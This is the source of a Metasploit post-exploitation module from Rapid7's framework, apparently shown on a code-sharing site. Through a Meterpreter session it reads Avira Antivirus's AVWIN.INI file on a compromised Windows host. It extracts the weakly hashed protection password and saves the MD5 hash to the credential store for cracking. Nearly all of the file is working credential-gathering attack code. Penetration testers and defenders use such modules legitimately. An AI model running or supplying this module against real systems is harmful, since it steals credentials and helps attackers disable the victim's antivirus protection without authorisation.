Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/avira_password.rb
19852 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows Gather Avira Password Extraction',

14
        'Description' => %q{

15
          This module extracts the weakly hashed password

16
          which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'Robert Kugler / robertchrk'],

20
        'Platform' => [ 'win' ],

21
        'SessionTypes' => [ 'meterpreter' ],

22
        'Notes' => {

23
          'Stability' => [CRASH_SAFE],

24
          'SideEffects' => [],

25
          'Reliability' => []

26
        },

27
        'Compat' => {

28
          'Meterpreter' => {

29
            'Commands' => %w[

30
              core_channel_eof

31
              core_channel_open

32
              core_channel_read

33
              core_channel_write

34
              stdapi_fs_stat

35
            ]

36
          }

37
        }

38
      )

39
    )

40
  end

41


42
  def run

43
    path = 'C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI'

44
    print_status("Checking default location (#{path}) ...")

45
    check_programdata(path)

46
  end

47


48
  def check_programdata(path)

49
    client.fs.file.stat(path)

50
    print_status("Found file at #{path}")

51
    get_ini(path)

52
  rescue StandardError

53
    print_error("Error reading or processing #{path}.")

54
  end

55


56
  def get_ini(filename)

57
    config = client.fs.file.new(filename, 'r')

58
    parse = Rex::Text.to_ascii(config.read)

59
    ini = Rex::Parser::Ini.from_s(parse)

60


61
    if ini == {}

62
      print_error('Unable to parse file')

63
      return

64
    end

65


66
    print_status('Processing configuration file...')

67
    passwd = ini['COMMON']['Password']

68
    passwd = passwd.delete '"'

69
    create_credential({

70
      workspace_id: myworkspace_id,

71
      origin_type: :session,

72
      session_id: session_db_id,

73
      post_reference_name: refname,

74
      private_type: :nonreplayable_hash,

75
      jtr_format: 'Raw-MD5u', # hard coded since hash identifier wont know its unicode

76
      private_data: passwd,

77
      service_name: 'Avira Antivirus',

78
      status: Metasploit::Model::Login::Status::UNTRIED

79
    })

80
    print_good("MD5(Unicode) hash found: #{passwd}")

81
    print_good('Info: Password length is limited to 20 characters.')

82
  end

83
end

84


85